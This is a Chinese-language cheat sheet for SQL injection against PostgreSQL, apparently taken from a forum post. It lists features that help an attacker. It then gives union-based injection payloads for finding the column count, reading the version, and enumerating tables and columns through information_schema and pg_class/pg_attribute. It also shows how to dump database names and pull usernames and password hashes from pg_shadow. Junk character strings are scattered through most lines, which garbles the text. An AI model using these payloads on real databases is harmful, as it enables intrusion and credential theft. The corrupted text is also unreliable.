结合了MSSQL MySQL Oracle的一些特点
. T3 y( E- _/ m( U3 {8 v支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/0 t( G. `+ P) Z% U- @2 D1 J7 n3 b
连接符: %20 , + , /**/ 内置函数:
2 N4 v& o* ?1 e2 _2 |. Qcurrent_database() //当前数据库名
. s9 M) Q4 o" g# `9 Zsession_user //会话用户
: q* x3 B; k/ k9 V% Kcurrent_user //当前数据库用户
' M. Z: p g! f, N, ^( R9 q1 ~( zuser //当前用户
/ }" q2 ]6 F; S& hversion() //数据库版本 Union注射:
0 B. Q8 W: a6 {4 Z9 `, w9 morder by n–% Z2 I9 l# [* K! W' f
and 1=2 union select null,null,null–; c3 g$ v+ |! L6 X5 k9 |* O
and 1=2 union select ‘beach’,null,null–
- g7 L% Z2 x3 A2 q5 o8 s: _* tand 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):3 G9 K S L8 H j! z
group_concat(table_name)
" p/ J3 r8 ~ y$ d# A. jand 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–2 k1 Q" K$ o! I3 @( u- p# C; ]- b
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–* f- g" m" w! e2 R7 ~
(老版本)1 W. z2 K5 ?( a$ ~
pg_class.oid对应pg_attribute.attrelid
/ f, r* \1 w# r7 s& t' Q2 epg_class.relname表名* F; T2 F, ?9 G q9 j
pg_attribute.attname字段名 select relname from pg_class获取表名
+ `' I H$ N- a* hselect oid from pg_class where 条件 获取参数
& _5 V( q. ]9 f: eselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:1 F/ J( h* s0 p4 ~5 R
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表8 d! p6 [5 y! ^/ k2 I# a
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–- Q9 Z7 i% b6 |7 v* D5 Z
由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名, C' ]' L9 h+ y; m
======================================================================
* c( y( g$ I7 I, jand 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库4 C+ `" |' U8 b; B0 p: Q* n- E
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 |